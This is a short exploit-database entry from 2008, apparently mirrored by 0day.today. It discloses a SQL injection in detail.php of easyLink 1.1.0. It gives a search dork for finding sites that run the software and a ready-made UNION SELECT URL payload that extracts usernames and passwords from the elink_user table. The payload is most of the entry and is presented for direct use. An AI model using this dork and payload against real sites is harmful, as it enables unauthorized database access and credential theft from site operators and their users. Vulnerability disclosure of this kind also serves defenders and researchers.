id: 3694
date: 09/18/2008
title: easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability
author: Egypt Coder
cves: 

==============================================================
easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability
==============================================================



Discovered By: Egypt Coder

Dork: Engine powered by easyLink V1.1.0.


Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user



#  0day.today [2023-03-25]  #